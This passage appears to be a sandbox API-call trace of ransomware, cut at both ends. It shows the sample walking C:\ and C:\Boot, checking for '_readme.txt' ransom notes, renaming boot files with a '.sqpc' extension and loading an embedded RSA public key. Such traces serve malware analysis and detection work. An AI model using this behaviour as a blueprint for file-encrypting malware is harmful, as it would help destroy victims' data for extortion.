(HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1ca8 [0143.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724d8 | out: hHeap=0x620000) returned 1 [0143.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac15a0 | out: hHeap=0x620000) returned 1 [0143.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283bf8 | out: hHeap=0x620000) returned 1 [0143.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1e88 | out: hHeap=0x620000) returned 1 [0143.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac17a8 | out: hHeap=0x620000) returned 1 [0143.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3272510 | out: hHeap=0x620000) returned 1 [0143.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723f8 | out: hHeap=0x620000) returned 1 [0143.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac17f8 | out: hHeap=0x620000) returned 1 [0143.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3282668 | out: hHeap=0x620000) returned 1 [0143.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac17f8 [0143.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1c58 | out: hHeap=0x620000) returned 1 [0143.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1820 | out: hHeap=0x620000) returned 1 [0143.223] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0143.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283bf8 [0143.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0143.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283fa0 | out: hHeap=0x620000) returned 1 [0143.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283bf8 | out: hHeap=0x620000) returned 1 [0143.223] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2009190, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc2009190, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc2009190, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0143.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1820 [0143.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1c58 [0143.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac17a8 [0143.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1c58 | out: hHeap=0x620000) returned 1 [0143.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1820 | out: hHeap=0x620000) returned 1 [0143.224] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0143.224] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0143.224] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89d0330, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc89d0330, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc89d0330, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0143.224] PathFindExtensionW (pszPath="C:\\_readme.txt") returned=".txt" [0143.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1820 | out: hHeap=0x620000) returned 1 [0143.224] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89d0330, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc89d0330, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc89d0330, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0143.224] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0143.224] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.224] PeekMessageW (in: lpMsg=0x9dbff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbff08) returned 0 [0143.224] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.224] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0143.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1c58 | out: hHeap=0x620000) returned 1 [0143.224] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.224] PathFindFileNameW (pszPath="") returned="" [0143.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1c58 [0143.224] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0143.225] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0143.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3290eb8 [0143.225] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3290eb8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0143.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aafb40 [0143.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac17a8 [0143.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0143.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1c58 | out: hHeap=0x620000) returned 1 [0143.225] FreeLibrary (hLibModule=0x759d0000) returned 1 [0143.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac17a8 | out: hHeap=0x620000) returned 1 [0143.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0143.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac17a8 [0143.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aafb40 [0143.225] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0143.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0143.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac17a8 | out: hHeap=0x620000) returned 1 [0143.225] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 1 [0143.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0143.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac17a8 [0143.225] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc89f6490, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc89f6490, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac17a8 | out: hHeap=0x620000) returned 1 [0143.226] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc89f6490, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc89f6490, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.226] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0143.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac17a8 [0143.226] PathFindExtensionW (pszPath="C:\\Boot\\BCD") returned="" [0143.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac17a8 | out: hHeap=0x620000) returned 1 [0143.226] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0143.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac17a8 [0143.226] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG") returned=".LOG" [0143.226] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac17a8 | out: hHeap=0x620000) returned 1 [0143.226] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0143.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac17a8 [0143.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272350 [0143.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac17a8 | out: hHeap=0x620000) returned 1 [0143.226] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG1") returned=".LOG1" [0143.226] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x700 [0143.226] GetFileSizeEx (in: hFile=0x700, lpFileSize=0x9dbfb40 | out: lpFileSize=0x9dbfb40*=0) returned 1 [0143.227] CloseHandle (hObject=0x700) returned 1 [0143.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272548 [0143.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0143.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3272548 | out: hHeap=0x620000) returned 1 [0143.227] MoveFileW (lpExistingFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), lpNewFileName="C:\\Boot\\BCD.LOG1.sqpc" (normalized: "c:\\boot\\bcd.log1.sqpc")) returned 1 [0143.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0143.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3272350 | out: hHeap=0x620000) returned 1 [0143.227] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0143.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac17a8 [0143.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272350 [0143.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac17a8 | out: hHeap=0x620000) returned 1 [0143.228] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG2") returned=".LOG2" [0143.228] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x700 [0143.228] GetFileSizeEx (in: hFile=0x700, lpFileSize=0x9dbfb40 | out: lpFileSize=0x9dbfb40*=0) returned 1 [0143.228] CloseHandle (hObject=0x700) returned 1 [0143.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272548 [0143.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0143.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3272548 | out: hHeap=0x620000) returned 1 [0143.228] MoveFileW (lpExistingFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), lpNewFileName="C:\\Boot\\BCD.LOG2.sqpc" (normalized: "c:\\boot\\bcd.log2.sqpc")) returned 1 [0143.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0143.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3272350 | out: hHeap=0x620000) returned 1 [0143.228] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0143.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac17a8 [0143.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272350 [0143.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac17a8 | out: hHeap=0x620000) returned 1 [0143.229] PathFindExtensionW (pszPath="C:\\Boot\\BOOTSTAT.DAT") returned=".DAT" [0143.229] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x700 [0143.229] GetFileSizeEx (in: hFile=0x700, lpFileSize=0x9dbfb40 | out: lpFileSize=0x9dbfb40*=65536) returned 1 [0143.229] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2ca0000 [0143.231] SetFilePointerEx (in: hFile=0x700, liDistanceToMove=0xffda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.231] ReadFile (in: hFile=0x700, lpBuffer=0x2ca0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9dbfb78, lpOverlapped=0x0 | out: lpBuffer=0x2ca0000*, lpNumberOfBytesRead=0x9dbfb78*=0x26, lpOverlapped=0x0) returned 1 [0143.233] SetFilePointer (in: hFile=0x700, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.233] ReadFile (in: hFile=0x700, lpBuffer=0x2ca0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9dbfb70, lpOverlapped=0x0 | out: lpBuffer=0x2ca0000*, lpNumberOfBytesRead=0x9dbfb70*=0x10000, lpOverlapped=0x0) returned 1 [0143.233] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 495 [0143.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f4) returned 0x32830c8 [0143.233] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 495 [0143.234] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 495 [0143.234] CryptAcquireContextW (in: phProv=0x9dbfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9dbfa50*=0x681a90) returned 1 [0143.235] CryptCreateHash (in: hProv=0x681a90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9dbfa58 | out: phHash=0x9dbfa58) returned 1 [0143.235] CryptHashData (hHash=0x3275b70, pbData=0x32830c8, dwDataLen=0x1f4, dwFlags=0x0) returned 1 [0143.235] CryptGetHashParam (in: hHash=0x3275b70, dwParam=0x2, pbData=0x0, pdwDataLen=0x9dbfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9dbfa54) returned 1 [0143.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x323e0d0 [0143.235] CryptGetHashParam (in: hHash=0x3275b70, dwParam=0x2, pbData=0x323e0d0, pdwDataLen=0x9dbfa54, dwFlags=0x0 | out: pbData=0x323e0d0, pdwDataLen=0x9dbfa54) returned 1 [0143.235] GetLastError () returned 0x0 [0143.235] SetLastError (dwErrCode=0x0) [0143.235] GetLastError () returned 0x0 [0143.235] SetLastError (dwErrCode=0x0) [0143.235] GetLastError () returned 0x0 [0143.235] SetLastError (dwErrCode=0x0) [0143.235] GetLastError () returned 0x0 [0143.235] SetLastError (dwErrCode=0x0) [0143.235] GetLastError () returned 0x0 [0143.235] SetLastError (dwErrCode=0x0) [0143.235] GetLastError () returned 0x0 [0143.235] SetLastError (dwErrCode=0x0) [0143.235] GetLastError () returned 0x0 [0143.235] SetLastError (dwErrCode=0x0) [0143.236] GetLastError () returned 0x0 [0143.236] SetLastError (dwErrCode=0x0) [0143.236] GetLastError () returned 0x0 [0143.236] SetLastError (dwErrCode=0x0) [0143.236] GetLastError () returned 0x0 [0143.236] SetLastError (dwErrCode=0x0) [0143.236] GetLastError () returned 0x0 [0143.236] SetLastError (dwErrCode=0x0) [0143.236] GetLastError () returned 0x0 [0143.236] SetLastError (dwErrCode=0x0) [0143.236] GetLastError () returned 0x0 [0143.236] SetLastError (dwErrCode=0x0) [0143.236] GetLastError () returned 0x0 [0143.236] SetLastError (dwErrCode=0x0) [0143.236] GetLastError () returned 0x0 [0143.236] SetLastError (dwErrCode=0x0) [0143.236] GetLastError () returned 0x0 [0143.236] SetLastError (dwErrCode=0x0) [0143.236] GetLastError () returned 0x0 [0143.236] SetLastError (dwErrCode=0x0) [0143.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac17a8 [0143.236] GetLastError () returned 0x0 [0143.236] SetLastError (dwErrCode=0x0) [0143.236] GetLastError () returned 0x0 [0143.236] SetLastError (dwErrCode=0x0) [0143.236] GetLastError () returned 0x0 [0143.236] SetLastError (dwErrCode=0x0) [0143.236] GetLastError () returned 0x0 [0143.236] SetLastError (dwErrCode=0x0) [0143.236] GetLastError () returned 0x0 [0143.236] SetLastError (dwErrCode=0x0) [0143.236] GetLastError () returned 0x0 [0143.237] SetLastError (dwErrCode=0x0) [0143.237] GetLastError () returned 0x0 [0143.237] SetLastError (dwErrCode=0x0) [0143.237] GetLastError () returned 0x0 [0143.237] SetLastError (dwErrCode=0x0) [0143.237] GetLastError () returned 0x0 [0143.237] SetLastError (dwErrCode=0x0) [0143.237] GetLastError () returned 0x0 [0143.237] SetLastError (dwErrCode=0x0) [0143.237] GetLastError () returned 0x0 [0143.237] SetLastError (dwErrCode=0x0) [0143.237] GetLastError () returned 0x0 [0143.237] SetLastError (dwErrCode=0x0) [0143.237] GetLastError () returned 0x0 [0143.237] SetLastError (dwErrCode=0x0) [0143.237] GetLastError () returned 0x0 [0143.237] SetLastError (dwErrCode=0x0) [0143.237] GetLastError () returned 0x0 [0143.237] SetLastError (dwErrCode=0x0) [0143.237] GetLastError () returned 0x0 [0143.237] SetLastError (dwErrCode=0x0) [0143.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272548 [0143.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac17a8 | out: hHeap=0x620000) returned 1 [0143.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x323e0d0 | out: hHeap=0x620000) returned 1 [0143.237] CryptDestroyHash (hHash=0x3275b70) returned 1 [0143.237] CryptReleaseContext (hProv=0x681a90, dwFlags=0x0) returned 1 [0143.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32830c8 | out: hHeap=0x620000) returned 1 [0143.237] UuidCreate (in: Uuid=0x9dbfa48 | out: Uuid=0x9dbfa48) returned 0x0 [0143.237] UuidToStringA (in: Uuid=0x9dbfa48, StringUuid=0x9dbfa40 | out: StringUuid=0x9dbfa40) returned 0x0 [0143.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.237] RpcStringFreeA (in: String=0x9dbfa40 | out: String=0x9dbfa40) returned 0x0 [0143.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3272548 | out: hHeap=0x620000) returned 1 [0143.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272548 [0143.238] RtlAllocateHeap (HeapHandle=0x620000, 